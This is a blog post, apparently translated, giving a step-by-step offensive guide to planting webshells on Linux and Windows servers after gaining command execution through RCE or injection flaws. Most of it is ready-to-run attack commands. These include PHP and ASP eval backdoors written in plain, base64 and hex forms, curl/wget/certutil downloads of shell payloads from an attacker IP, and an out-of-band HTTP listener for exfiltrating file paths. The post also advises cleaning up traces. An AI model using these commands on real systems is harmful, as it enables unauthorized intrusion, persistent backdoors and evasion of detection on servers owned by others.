Summary of file landing and utilization of command execution

0x01 Preface

How to write to Webshell after obtaining a permission to execute commands by exploiting various RCE remote command execution or MSSQL injection vulnerabilities? Here we conduct some tests based on multiple scenarios that may be encountered, such as: Linux/Windows, out/out of the Internet, with/without echo.

Generally, when we are sure that we can execute the command, we will choose to go online directly to CS/MSF, but we will also encounter the scenario where there is no Internet access and no echo. In this case, we may need to find the absolute path of the target website and write a Webshell first. Then, follow-up information collection and intranet penetration are carried out.

Note: We can upload a file randomly through the upload function in the front/background of the website, and then use commands such as Windows for or Linux to find the file just uploaded, or the existing file under the website to get the absolute path, and finally Just write to the file and continue to look down.

0x02 Linux

(1) The target is out of the network, and the command is echoed

If the target host can go out to the Internet, and the execution command is echoed, then we can directly obtain the absolute path of the target website by executing the following command, and then use the following methods to write or download the Webshell.

Find absolute paths:

locate 1653042293000.png 2>/dev/null
find / -name 1653042293000.png 2>/dev/null
find / | grep 1653042293000.png 2>/dev/null
find /var/www/html/ -name "*.php" | xargs grep "so-and-so website"
copy

Write in the normal way:

echo '<?php eval($_POST[1]);?>' > /var/www/html/shell.php
copy

Remote download write:

curl http://192.168.1.120/shell.txt > /var/www/html/shell.php
wget http://192.168.1.120/shell.txt -O /var/www/html/shell.php
copy

(2) The target is out of the network, and the command is not echoed

If the target host can go out to the Internet, but there is no echo when executing the command, then we can use the httplog method to obtain the absolute path of the target website by executing the following command, and then use the following method to write to the Webshell, which can be escaped or protected. Try writing in encoding.

Find absolute paths:

python -m SimpleHTTPServer 8888
curl http://192.168.1.120:8888/`find / | grep 1653042293000.png`
wget http://192.168.1.120:8888/`find / | grep 1653042293000.png`
copy

Write in encoding:

echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+ | base64 -d > /var/www/html/shell.php
echo 3C3F706870206576616C28245F504F53545B315D293B3F3E | xxd -r -ps > /var/www/html/shell.php
copy

(3) The target is not connected to the Internet, and the command is not echoed

If the target host cannot go out to the Internet, and there is no echo when executing the command, we can first traverse the absolute path of the 1653042293000.png file by executing the following command, and then traverse the absolute path of the file again, or write Webshell to the file at the same time level directory.

In practical applications, it is best to first determine the absolute path of the target website, and then write to the Webshell separately. It is best not to use the second command directly, because if there is a file with the same name on the target host, it will be written to the multiple absolute paths found. When entering the file, you should also pay attention to cleaning up traces.

Find the absolute path to write to the web directory:

find / -name 1653042293000.png | while read f;do sh -c 'find / -name 1653042293000.png' >$(dirname $f)/path.txt;done
copy

Find the absolute path to write to the Webshell:

find / -name 1653042293000.png | while read f;do sh -c "echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+ | base64 -d">$(dirname $f)/shell.php;done
find / -name 1653042293000.png | while read f;do sh -c "echo 3C3F706870206576616C28245F504F53545B315D293B3F3E | xxd -r -ps">$(dirname $f)/shell.php;done
copy

0x03 Windows

(1) The target is out of the network, and the command is echoed

If the target host can go out to the Internet, and the execution command has an echo, then we can obtain the absolute path of the target website by executing commands such as dir, where, for, finstr, or reading the IIS configuration file, and then use the following Multiple ways to write or download webshells.

Find absolute paths:

dir /a/b/s C:\1653042293000.png
where /r C:\1653042293000.png
for /r "C:\" %i in (1653042293000.png*) do @echo %i
findstr /n /s /i "so-and-so website" C:\*.asp
%windir%\system32\inetsrv\appcmd list VDIR
copy

Write in the normal way:

set /p="<%execute request("1")%>" <nul >> C:\inetpub\wwwroot\shell.asp
echo ^<%execute request("1")%^> > C:\inetpub\wwwroot\shell.asp
certutil -urlcache -split -f http://192.168.1.105:8080/shell.txt C:\inetpub\wwwroot\shell.asp
copy

(2) The target is out of the network, and the command is not echoed

If the target host can go out to the Internet, but there is no echo when executing the command, then we can run the following command to find the 1653042293000.png file in the specified C drive in a loop, save the absolute path of the found file in the %i variable, and then execute certutil Obtain the absolute path of the target website through httplog, or write it directly into the Webshell. If escaping or protection is required, you can try to write in encoding, and shell.txt needs to be cleaned up.

Find absolute paths:

python -m SimpleHTTPServer 8888
for /r C:\ %i in (1653042293000.png*) do certutil -urlcache -split -f http://192.168.1.120:8888/%i
copy

Write in the normal way:

for /r C:\ %i in (1653042293000.png*) do echo ^<%execute request("1")%^> > %i/../shell.asp
copy

Write in encoding:

for /r C:\ %i in (1653042293000.png*) do echo PCVleGVjdXRlIHJlcXVlc3QoIjEiKSU+ > %i/../shell.txt & certutil -decode %i/../shell.txt %i/../shell.asp
for /r C:\ %i in (1653042293000.png*) do echo 3C256578656375746520726571756573742822312229253E > %i/../shell.txt & certutil -decodehex %i/../shell.txt %i/../shell.asp
copy

(3) The target is not connected to the Internet, and the command is not echoed

If the target host cannot go out to the Internet, and there is no echo when executing the command, then we can execute the following command to find the absolute path of the 1653042293000.png file, or write the Webshell to the same level directory of the file, which needs to be escaped or have You can try to write in encoding mode during protection.

Although the two commands look similar, the execution efficiency of the first one is higher, because it has been written during the execution of the command, and the second one must be written after the execution of the command is completed, so I personally recommend using the first one. Kind, pay attention to clean up the traces under the file path of the same name.

Find the absolute path to write to the web directory:

for /r C:\ %i in (1653042293000.png*) do echo %i> %i\..\path.txt
for /f %i in ('dir /s /b C:\1653042293000.png') do echo %i> %i\..\path.txt
forfiles /P C:\ /S /M 1653042293000.png /C "cmd /c dir /a/b/s C:\1653042293000.png > path.txt"
copy

Find the absolute path to write to the Webshell:

for /r C:\ %i in (1653042293000.png*) do echo ^<%execute request("1")%^> > %i/../shell.asp
for /f %i in ('dir /s /b C:\1653042293000.png') do echo ^<%execute request("1")%^> > %i/../shell.asp
forfiles /P C:\ /S /M 1653042293000.png /C "cmd /c echo ^<%execute request("1")%^> > shell.asp"
copy

Conclusion at the end of the article:

In this article, I will divide the way to find the absolute path into 3 ways: command search (with echo), httplog takeout (without echo), write to the Web directory (without Internet access), and three ways to write files: Regular write, encoded write, remote download. Linux and Windows use the same way, but the commands are different. They all find the absolute path according to the file name and file content. The common file writing and downloading methods are used for Getshell.

Posted by daydreamer on Thu, 15 Sep 2022 01:59:19 +0930